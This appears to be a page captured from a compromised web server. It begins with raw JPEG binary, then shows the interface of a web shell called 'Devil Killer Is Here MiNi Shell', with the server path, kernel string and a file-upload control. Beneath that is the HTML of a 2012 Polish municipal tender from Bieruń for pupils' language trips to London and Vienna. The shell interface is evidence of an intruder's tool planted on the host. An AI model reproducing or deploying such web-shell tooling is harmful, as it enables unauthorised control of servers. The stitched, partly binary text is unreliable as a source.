JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120911/195223-N-2012.html

<p class="kh_header"><b>Bieruń: Kompleksowa usługa polegająca na zorganizowaniu wyjazdów na warsztaty edukacyjne dla uczestników kół językowych 
w ramach projektu pn. Akademia sukcesu</b><br>
<b>Numer ogłoszenia: 195223 - 2012; data zamieszczenia: 11.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa usługa polegająca na zorganizowaniu wyjazdów na warsztaty edukacyjne dla uczestników kół językowych 
w ramach projektu pn. Akademia sukcesu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kody CPV: 
63510000-7 Usługi biur podróży i podobne
63511000-4 Organizacja wycieczek
63500000-4 Usługi biur podróży, podmiotów turystycznych i pomocy turystycznej
63512000-1 Usługi sprzedaży biletów podróżnych i pakietów wycieczkowych
63515000-2 Usługi podróżne
80580000-3 Oferowanie kursów językowych

1.	Przedmiotem niniejszego zamówienia jest kompleksowa usługa polegająca na zorganizowaniu wyjazdów na warsztaty edukacyjne do Londynu i Wiednia w ramach projektu pn. Akademia sukcesu (zwanego dalej projektem) na warunkach określonych w SIWZ, załącznikach do SIWZ, we wzorze umowy.
Projekt realizowany i finansowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych I zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.

 
Szczegółowy opis w/w projektu zwanego dalej projektem, zawiera załącznik do SIWZ. 
Projekt da szansę uczestnikom/uczestniczkom koła Let`s go i  Guten Tag  wyjazdu do kraju, w którym posługuje się językiem, który ich fascynuje. Tygodniowy wyjazd da szansę na zapoznanie się z kulturą innego kraju a także możliwość konwersacji z lokalnymi mieszkańcami, co da duży efekt w kształceniu językowym młodzieży.
2.	Zakres przedmiotu zamówienia - założenia programowo - organizacyjne wyjazdów na warsztaty edukacyjne: 
I - Warsztaty edukacyjne z języka angielskiego dla uczestników koła Let`s go 
w ramach projektu pn. Akademia sukcesu - WYJAZD DO LONDYNU (ANGLIA)
a)	Liczba uczestników: w wyjazdach będzie uczestniczyło 11 uczniów + 2 opiekunów + 
1 kierownik +1 kierownik - pilot (kierownicy zapewnieni przez wykonawcę), łącznie 15 uczestników. Imienną listę uczestników wyjazdu sporządzi zamawiający i przekaże wykonawcy w terminie do 7 dni od daty zawarcia umowy. Uwaga! - native speaker nie jest uwzględniony w liczbie uczestników wyjazdu.
b)	Czas trwania wyjazdu: 7 dni, 6 nocy.
c)	Termin wyjazdu: 
- od 29 październik do 4 listopad 2012 r. 
[11 uczniów + 2 opiekunów + 1 kierownik + 1 kierownik - pilot (kierownicy zapewnieni przez wykonawcę), łącznie 15 uczestników]. Uwaga! - native speaker nie jest uwzględniony w liczbie uczestników wyjazdu.
d)	Program, plan wyjazdu: wyjazd będzie realizowany zgodnie z następującymi założeniami:
Dzień 1 
- transfer z Bierunia na lotnisko w Polsce
Wsiadanie uczestników będzie się odbywało w dwóch punktach tj.:
-	Gimnazjum nr 2, ul. Licealna 17 
-	Gimnazjum nr 1 im. Karola Wierzgonia, ul. Warszawska 294;
- przelot z Polski do Londynu (Anglia);
- transfer z lotniska Londyn do miejsca zakwaterowania;
- zakwaterowanie;
- spacer po centrum z pilotem i czas wolny;
- obiadokolacja w restauracji na mieście;
- powrót do hotelu, nocleg.


Dzień 2, 3, 4, 5, 6
- Śniadania w hotelu.
- Obiadokolacje w angielskim pubie oraz w restauracjach w rejonie hotelu.
- Warsztaty edukacyjne z języka angielskiego z native speaker - (5 dni x 3,5 godz.) połączone ze zwiedzaniem.

Warsztaty przygotowane w formie interaktywnej prezentacji, zwiedzania oraz ćwiczeń. Prowadzone i koordynowane w języku angielskim przez native speakers w zakresie umiejętności uczniów biorących udział w warsztatach. Zajęcia odbywać się będą w terenie 
i połączone będą ze zwiedzaniem oraz w pomieszczeniach z ilością miejsc 
i wyposażeniem umożliwiającym przeprowadzenie zajęć dla wskazanej liczby osób oraz zapewnienie odpowiednich warunków i środowiska pracy niezbędnych do przeprowadzenia zajęć. Ćwiczenia i program edukacyjny przygotowany pod kątem młodzieży uczącej się języka angielskiego, z uwzględnieniem rozumienia, konwersacji, analizy i wyciągania wniosków. Tematyka obejmująca przedmioty curriculum - historia, ekonomia, przyroda, geografia, technika, transport, sztuka, media oraz bieżące sprawy społeczne i codzienne życiowe sytuacje. Każdy z uczniów otrzyma Study pack - folder z informacjami, zadania 
i projekty do wykonania. Program warsztatów będzie obejmował m.in.: wizytę w Tower of London, rejs wycieczkowy statkiem po Tamizie (z Westminster Pier do Greenwich - możliwość podziwiania najważniejszych zabytków od strony rzeki) wraz z prezentacjami interaktywnymi. W ramach programu warsztatów będzie zorganizowana również wizyta 
w teatrze na West End na światowej klasy musical do wyboru. Program zwiedzania 
z przewodnikiem zakłada także m.in. Wizytę w British Museum, Natural History Museum, czas na zakupy, Madame Tussauds, London Eye, Greenwich - Obserwatorium Astronomiczne z południkiem zerowym, Muzeum Marynistyki, zmianę warty pod Buckingham Palace, spacer przez St. James Park, Whitehall, Downing Street - siedziba premiera, Gwardia konna przy Horse Guards Parade, Trafalgar Square ze słynną kolumną Nelsona, Wizytę w Galerii Narodowej - słynna kolekcja malarstwa (m.in. Rubens, Rembrandt, Van Gogh, Monet), Tower Bridge - słynny most zwodzony oraz spacer nad Tamizą do Doków Św. Katarzyny, czas na zakupy na Oxford Street lub na Hammersmith.



 
Dzień 7
- śniadanie, wykwaterowanie z hotelu, możliwość złożenia bagaży w przechowalni 
w miejscu zakwaterowania;
- spacer po centrum z pilotem i czas wolny;
- obiad w restauracji na mieście;
- transfer z miejsca zakwaterowania na lotnisko Londyn;
- przelot z Londynu do Polski;
- transfer z lotniska do Bierunia
Wysiadanie uczestników będzie się odbywało w dwóch punktach tj.:
-	Gimnazjum nr 2, ul. Licealna 17 
-	Gimnazjum nr 1 im. Karola Wierzgonia, ul. Warszawska 294.
e)	Posiłki dla uczestników:
- śniadania (co najmniej jeden posiłek na ciepło oraz zimna płyta) w formie stołu szwedzkiego w miejscu zakwaterowania [6 śniadań na osobę];
- obiad (posiłek 2-daniowy) [1 obiad na osobę];
- obiadokolacja (posiłek 2-3-daniowy) w restauracji [w tym 1x tradycyjny angielski pub + 1x chiński bufet + 1x pizza pasta bufet] [6 obiadokolacji na osobę].   
Do wszystkich posiłków serwowane napoje ciepłe i zimne (tj. herbata i kawa z dodatkami: cukier, cytryna, mleko; woda mineralna gazowana i niegazowana, soki owocowe) w ilości 0,5 l na osobę w ramach jednego posiłku.
f)	Zakwaterowanie uczestników: uczestników wyjazdu należy zakwaterować w hotelu 
o standardzie 2,5 - 4 gwiazdkowym położonym w strefie 1-2 metra, skąd będzie dobra komunikacja, a dojazd do centrum (Londyn) nie będzie zajmował więcej niż 30 minut. Pokoje z własnym, pełnym węzłem sanitarnym - łazienkami, wieloosobowe (2-3-4-os) dla młodzieży, 1-os dla opiekunów, kierowników.
g)	Środek transportu: podróż z Polski do Anglii (Londyn) oraz z Anglii (Londyn) do Polski odbywa się samolotem. Wykonawca zapewni transfer:
- z Bierunia na lotnisko w Polsce;
- z lotniska w Londynie do miejsca zakwaterowania;
- z miejsca zakwaterowania na lotnisko w Londynie;
- z lotniska w Polsce do Bierunia.



Transfer odbywać się będzie środkiem transportu wyposażonym w sprawną klimatyzację oraz miejsca siedzące dla wszystkich uczestników wyjazdu. W przypadku awarii technicznej pojazdu w trakcie realizacji zamówienia, wykonawca zobowiązany jest podstawić, w czasie umożliwiającym realizację programu, pojazd zastępczy o takich samych lub lepszych parametrach technicznych, zgodnych ze SIWZ.
h)	Wykonawca będzie odpowiedzialny za i uwzględni w cenie ofertowej:
- rezerwację i zakup biletów lotniczych dla uczestników wyjazdu [11 uczniów + 
2 opiekunów + 1 kierownik + 1 kierownik - pilot (kierownicy zapewnieni przez wykonawcę)], łącznie 15 osób w obydwie strony (Polska - Londyn, Londyn - Polska);
- zapewnienie transferu o którym mowa w ppkt g dla łącznie 15 osób;
- zapewnienie zakwaterowania o którym mowa w ppkt f: 6 noclegów dla łącznie 
15 uczestników wyjazdu. Należy uwzględnić wszelkie koszty zakwaterowania uczestników wyjazdu w tym np. opłaty klimatyczne;
- zapewnienie posiłków wraz z napojami (6 śniadań, 1 obiad, 6 obiadokolacji) dla łącznie 15 uczestników w trakcie trwania wyjazdu;
- zapewnienie kompleksowego  ubezpieczenia dla łącznie 15 uczestników wyjazdu uwzględniającego w szczególności koszty leczenia, następstwa nieszczęśliwych wypadków w wysokości min. 10 000,00 zł/osobę, bagaż podróżny;
- zapewnienie biletów komunikacji miejskiej w trakcie całego pobytu dla łącznie 
15 uczestników;
-  zapewnienie kierownika - pilota - tłumacza ze znajomością języka angielskiego będącego do dyspozycji uczestników wyjazdu w trakcie całego pobytu;
- przygotowanie, opracowanie warsztatów dla wszystkich uczniów, biorących udział 
w przedmiotowym wyjeździe. Opracowanie tych materiałów i przekazanie ich do akceptacji koordynatorowi projektu będzie miało miejsce w terminie do 7 dni od daty zawarcia umowy.
- zapewnienie wszystkim uczniom biorącym udział w wyjeździe Study pack - folder 
z informacjami, zadania i projekty do wykonania w trakcie przedmiotowych warsztatów. Jeden komplet tych materiałów i przekazanie go do akceptacji koordynatorowi projektu będzie miało miejsce w terminie do 7 dni od daty zawarcia umowy.
- zapewnienie native speaker - 5 dni x 3,5 godz. dla wszystkich uczniów biorących udział 
w przedmiotowym wyjeździe w trakcie pobytu (Uwaga! - native speaker nie jest uwzględniony w liczbie uczestników wyjazdu);


- zapewnienie przewodników, biletów wstępu do zwiedzanych obiektów dla łącznie 
15 uczestników wyjazdu (opcjonalnie dla native speaker) zgodnie z programem niniejszych warsztatów, zwiedzania tj.: Warsztaty: warsztaty językowe z native speaker - (5 dni x 3,5 godz.), wizyta w Tower of London, rejs po Tamizie oraz prezentacje interaktywne, wizyta w teatrze na West End na światowej klasy musical do wyboru (wybór spektaklu, musicalu zgodny z dostępnością miejsc). Zwiedzanie zgodnie z programem m.in.  Wizyta w British Museum, Natural History Museum, czas na zakupy, Madame Tussauds, London Eye, Greenwich - Obserwatorium Astronomiczne z południkiem zerowym, Muzeum Marynistyki, zmiana warty pod Buckingham Palace, spacer przez St. James Park, Whitehall, Downing Street - siedziba premiera, Gwardia konna przy Horse Guards Parade, Trafalgar Square ze słynną kolumną Nelsona, Wizyta w Galerii Narodowej - słynna kolekcja malarstwa (m.in. Rubens, Rembrandt, Van Gogh, Monet), Tower Bridge - słynny most zwodzony oraz spacer nad Tamizą do Doków Św. Katarzyny, czas na zakupy na Oxford Street lub na Hammersmith.
- zapewnienie sal na potrzeby warsztatów oraz wydzielonych miejsc do spotkań młodzieży 
w hotelu w trakcie całego pobytu.
i)	Zamawiający będzie odpowiedzialny za:
- rekrutację uczestników;
- akceptację planów, materiałów, dokumentów dotyczących zorganizowania i prowadzenia warsztatów.

II - Warsztaty edukacyjne z języka niemieckiego dla uczestników koła Guten Tag
w ramach projektu pn. Akademia sukcesu - WYJAZD DO WIEDNIA (AUSTRIA)
a)	Liczba uczestników: w wyjazdach będzie uczestniczyło 10 uczniów + 2 opiekunów + 
1 kierownik + 1 kierownik - pilot (kierownicy zapewnieni przez wykonawcę), łącznie 14 uczestników. Imienną listę uczestników wyjazdu sporządzi zamawiający i przekaże wykonawcy w terminie do 7 dni od daty zawarcia umowy. Uwaga! - native speaker nie jest uwzględniony w liczbie uczestników wyjazdu.
b)	Czas trwania wyjazdu: 7 dni, 6 nocy.
c)	Termin wyjazdu: 
- od 29 października do 4 listopada 2012 r. 
[10 uczniów + 2 opiekunów + 1 kierownik + 1 kierownik - pilot (kierownicy zapewnieni 




przez wykonawcę), łącznie 14 uczestników]. Uwaga! - native speaker nie jest uwzględniony w liczbie uczestników wyjazdu.
d)	Program, plan wyjazdu: wyjazd będzie realizowany zgodnie z następującymi założeniami:
Dzień 1 
- wyjazd z Bierunia do Wiednia 
Wsiadanie uczestników będzie się odbywało w dwóch punktach tj.:
-	Gimnazjum nr 2, ul. Licealna 17 
-	Gimnazjum nr 1 im. Karola Wierzgonia, ul. Warszawska 294;
- przyjazd do hotelu, zakwaterowanie;
- spacer po centrum z pilotem i czas wolny;
- obiadokolacja w restauracji na mieście;
- powrót do hotelu, nocleg.
Dzień 2, 3, 4, 5, 6
- Śniadania w hotelu.
- Obiadokolacje w wiedeńskich knajpkach, kawiarniach oraz w restauracjach w rejonie hotelu.
- Warsztaty edukacyjne z języka niemieckiego z native speaker - (5 dni x 3,5 godz.) połączone ze zwiedzaniem.

Warsztaty przygotowane w formie zwiedzania oraz ćwiczeń. Prowadzone i koordynowane w języku niemieckim przez native speakers w zakresie umiejętności uczniów biorących udział w warsztatach. Zajęcia odbywać się będą w terenie i połączone będą ze zwiedzaniem oraz w pomieszczeniach z ilością miejsc i wyposażeniem umożliwiającym przeprowadzenie zajęć dla wskazanej liczby osób oraz zapewnienie odpowiednich warunków i środowiska pracy niezbędnych do przeprowadzenia zajęć. Ćwiczenia i program edukacyjny przygotowany pod kątem młodzieży uczącej się języka niemieckiego, 
z uwzględnieniem rozumienia, konwersacji, analizy i wyciągania wniosków. Tematyka obejmująca przedmioty curriculum - historia, ekonomia, przyroda, geografia, technika, transport, sztuka, media oraz bieżące sprawy społeczne i codzienne życiowe sytuacje. Każdy z uczniów otrzyma folder z informacjami oraz Quizy, materiały, zadania i projekty do wykonania. 



Program warsztatów oraz program zwiedzania wraz z opiekunem w godzinach popołudniowych:
- 1,5 h warsztaty w języku niemieckim w hotelu,
- 2 h program na terenie miasta Wiedeń w tym w ramach programu warsztatów wizyta 
w Operze Wiedeńskiej na światowej klasy przedstawieniu oraz rejs wycieczkowy statkiem po Dunaju - możliwość podziwiania najważniejszych zabytków od strony rzeki.
- Zwiedzanie m.in. Wiedeńskiej Starówki, Bajkowy Dom Hundertwassera, Galeria Austriacka Belvedere, Katedra św. Szczepana, Powozownia, Pałac Schönbrunn oraz Ogrody Pałacu, Muzeum Historii Miasta, Muzeum Techniki, Zamek Hofburg, Skarbiec Wiedeński, Lunapark Prater - Koło Diabelskie, czas na zakupy, spacer ulicami miasta 
w tym spacer przez Plac Karola, Park Miejski z najsłynniejszym pomnikiem miasta - złotym Straussem oraz najsłynniejszymi ulicami i placami: Albertina, Hofburg, Kohlmarkt, Graben, Kärtnerstraße, Katedra św. Szczepana, siedziba Zakonu Krzyżackiego przy Singergasse, secesyjny zegar figuralny Anker, Wiedeński Trójkąt Bermudzki oraz wiele malowniczych zaułków starówki i nadunajską dzielnicą Wiednia - Donaustadt.
Dzień 7
- śniadanie, wykwaterowanie z hotelu, możliwość złożenia bagaży w przechowalni 
w miejscu zakwaterowania;
- spacer po centrum z pilotem i czas wolny;
- powrót do Polski do Bierunia, w drodze postój na obiad
Wysiadanie uczestników będzie się odbywało w dwóch punktach tj.:
-	Gimnazjum nr 2, ul. Licealna 17 
-	Gimnazjum nr 1 im. Karola Wierzgonia, ul. Warszawska 294.
e)	Posiłki dla uczestników:
- śniadania (co najmniej jeden posiłek na ciepło oraz zimna płyta) w formie stołu szwedzkiego w miejscu zakwaterowania [6 śniadań na osobę];
- obiad (posiłek 2-daniowy) [1 obiad na osobę];
- obiadokolacja (posiłek 2-3-daniowy) w restauracji [w tym 1x tradycyjny posiłek kuchni wiedeńskiej + 1x pizza pasta bufet] [6 obiadokolacji na osobę].   
Do wszystkich posiłków serwowane napoje ciepłe i zimne (tj. herbata i kawa z dodatkami: cukier, cytryna, mleko; woda mineralna gazowana i niegazowana, soki owocowe) w ilości 0,5 l na osobę w ramach jednego posiłku.

f)	Zakwaterowanie uczestników: uczestników wyjazdu należy zakwaterować w hotelu 
o standardzie 2,5 - 4 gwiazdkowym położonym w pobliżu centrum miasta (Wiedeń), skąd będzie dobra komunikacja, a dojazd do centrum nie będzie zajmował więcej niż 30 minut.
Pokoje z własnym, pełnym węzłem sanitarnym - łazienkami, wieloosobowe (2-3-4-os) dla młodzieży, 1-os dla opiekunów, kierownika.
g)	Środek transportu: podróż do/z miejsca zakwaterowania, z Polski do Wiednia oraz 
z Wiednia do Polski wykonawca zapewni komfortowym środkiem transportu wyposażonym w sprawną klimatyzację, miejsca siedzące dla wszystkich uczestników wyjazdu, komfortowe fotele, nocne oświetlenie, nagłośnienie z mikrofonem oraz woreczki na nieczystości. W przypadku awarii technicznej pojazdu w trakcie realizacji zamówienia, wykonawca zobowiązany jest podstawić, w czasie umożliwiającym realizację programu, pojazd zastępczy o takich samych lub lepszych parametrach technicznych, zgodnych ze SIWZ.
h)	Wykonawca będzie odpowiedzialny za i uwzględni w cenie ofertowej:
- rezerwację i zakup biletów na przejazd środkiem transportu dla uczestników wyjazdu 
[10 uczniów + 2 opiekunów + 1 kierownik + 1 kierownik - pilot (kierownicy zapewnieni przez wykonawcę)], łącznie 14 osób w obydwie strony (Bieruń - Wiedeń, Wiedeń - Bieruń);
- zapewnienie zakwaterowania o którym mowa w ppkt f: 6 noclegów dla łącznie 
14 uczestników wyjazdu. Należy uwzględnić wszelkie koszty zakwaterowania uczestników wyjazdu w tym np. opłaty klimatyczne;
- zapewnienie posiłków wraz z napojami (6 śniadań, 1 obiad, 6 obiadokolacji) dla łącznie 14 uczestników w trakcie trwania wyjazdu;
- zapewnienie kompleksowego  ubezpieczenia dla łącznie 14 uczestników wyjazdu uwzględniającego w szczególności koszty leczenia, następstwa nieszczęśliwych wypadków w wysokości min. 10 000,00 zł/osobę, bagaż podróżny;
- zapewnienie biletów komunikacji miejskiej w trakcie całego pobytu dla łącznie 
14 uczestników;
- zapewnienie kierownika - pilota - tłumacza ze znajomością języka niemieckiego będącego do dyspozycji uczestników wyjazdu w trakcie całego pobytu;
- przygotowanie, opracowanie warsztatów dla wszystkich uczniów, biorących udział 
w przedmiotowym wyjeździe. Opracowanie tych materiałów i przekazanie ich do akceptacji koordynatorowi projektu będzie miało miejsce w terminie do 7 dni od daty zawarcia umowy.


- zapewnienie wszystkim uczniom biorącym udział w wyjeździe folderu z informacjami oraz Quizy, materiały, zadania i projekty do wykonania w trakcie przedmiotowych warsztatów;
Jeden komplet tych materiałów i przekazanie go do akceptacji koordynatorowi projektu będzie miało miejsce w terminie do 7 dni od daty zawarcia umowy.
- zapewnienie native speaker - 5 dni x 3,5 godz. dla wszystkich uczniów biorących udział 
w przedmiotowym wyjeździe w trakcie pobytu (Uwaga! - native speaker nie jest uwzględniony w liczbie uczestników wyjazdu);
- zapewnienie przewodników, biletów wstępu do zwiedzanych obiektów dla łącznie 
14 uczestników wyjazdu (opcjonalnie dla native speaker) zgodnie z programem niniejszych warsztatów, zwiedzania tj.: Warsztaty: warsztaty językowe z native speaker - (5 dni x 3,5 godz.), wizyta w Operze Wiedeńskiej na światowej klasy przedstawieniu (wybór przedstawienia zgodny z dostępnością miejsc) oraz rejs wycieczkowy statkiem po Dunaju - możliwość podziwiania najważniejszych zabytków od strony rzeki. Zwiedzanie zgodnie 
z programem m.in. Wiedeńskiej Starówki, Bajkowy Dom Hundertwassera, Galeria Austriacka Belvedere, Katedra św. Szczepana, Powozownia, Pałac Schönbrunn oraz Ogrody Pałacu, Muzeum Historii Miasta, Muzeum Techniki, Zamek Hofburg, Skarbiec Wiedeński, Lunapark Prater - Koło Diabelskie, czas na zakupy, spacer ulicami miasta 
w tym spacer przez Plac Karola, Park Miejski z najsłynniejszym pomnikiem miasta - złotym Straussem oraz najsłynniejszymi ulicami i placami: Albertina, Hofburg, Kohlmarkt, Graben, Kärtnerstraße, Katedra św. Szczepana, siedziba Zakonu Krzyżackiego przy Singergasse, secesyjny zegar figuralny Anker, Wiedeński Trójkąt Bermudzki oraz wiele malowniczych zaułków starówki i nadunajską dzielnicą Wiednia - Donaustadt.
- zapewnienie sal na potrzeby warsztatów oraz wydzielonych miejsc do spotkań młodzieży 
w hotelu w trakcie całego pobytu.
i)	Zamawiający będzie odpowiedzialny za:
- rekrutację uczestników;
- akceptację planów, materiałów, dokumentów dotyczących zorganizowania i prowadzenia warsztatów.

UWAGA:
Cena warsztatów podana przez wykonawcę, musi zawierać wszystkie świadczenia, tak aby uczestnicy, kierownicy oraz opiekunowie nie byli zobligowani do ponoszenia jakichkolwiek kosztów własnych. Wykonawca nie może żądać od zamawiającego dopłaty kursowej. 


3.	Zamawiający nie pokrywa kosztów zagranicznych i krajowych rozmów telefonicznych wykonywanych z miejsca zakwaterowania, pokoi hotelowych przez osoby zakwaterowane oraz kosztów np. związanych z udostępnieniem w pokojach płatnej telewizji lub mini-baru.
4.	Na 7 dni roboczych przed realizacją zamówienia (w dniach i godzinach urzędowania zamawiającego) wykonawca przedstawi zamawiającemu do zatwierdzenia szczegółowy opis sposobu realizacji usługi, a następnie podczas zorganizowanego spotkania informacyjnego w siedzibie zamawiającego przedstawi go rodzicom/opiekunom uczestników warsztatów oraz odpowie na ewentualne ich pytania.
5.	Zachowanie przy realizacji przedmiotu umowy należytej staranności i dbałości o interesy zamawiającego.
6.	Wykonawca zobowiązany jest wykonać przedmiot zamówienia zgodnie z obowiązującymi przepisami polskimi i europejskimi oraz zgodnie z założeniami i wymogami projektu.
7.	Wspomaganie promocji i ewaluacji projektu - informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego, przestrzeganie wytycznych dotyczących oznaczenia projektu w ramach POKL oraz współpracy z koordynatorem oraz liderami projektu.
8.	Prowadzenie warsztatów ze szczególnym stosowaniem aktywizujących metod nauczania 
z naciskiem na umiejętność wykorzystania wiedzy w praktyce oraz rozwój kompetencji kluczowych a także przestrzegania zasady równych szans.
9.	Zamawiający zastrzega sobie prawo wglądu do dokumentów związanych z realizacją przez wykonawcę przedmiotu umowy w tym dokumentów finansowych.
10.	Zamawiający nie przewiduje: udzielenia zamówień uzupełniających, zaliczek na poczet wykonania zamówienia, aukcji elektronicznej, zawarcia umowy ramowej, dynamicznego systemu zakupów w rozumieniu ustawy pzp oraz stosowania wymagań określonych w art. 
29. ust. 4 ustawy pzp.
Zamawiający nie dopuszcza składania ofert wariantowych i częściowych. 
11.	Study pack oraz  folder z informacjami oraz Quizy, materiały, zadania i projekty do wykonania w trakcie przedmiotowych warsztatów z j. angielskiego i niemieckiego - stanowiące element przedmiotu zamówienia muszą być kompletne i fabrycznie nowe, wolne od wad, dopuszczone do stosowania w placówkach oświatowych. Wszystkie dostarczone pomoce muszą posiadać odpowiednie atesty, certyfikaty, świadectwa jakości i spełniać wszelkie wymogi norm określonych obowiązującym prawem. Jeden komplet tych materiałów przekaże wykonawca do akceptacji koordynatorowi projektu w terminie do 7 dni od daty zawarcia umowy.


12.	Zamawiający zobowiązany jest do zapoznania się i stosowania Procedur organizacji wycieczek szkolnych (załącznik nr 7 do SIWZ).
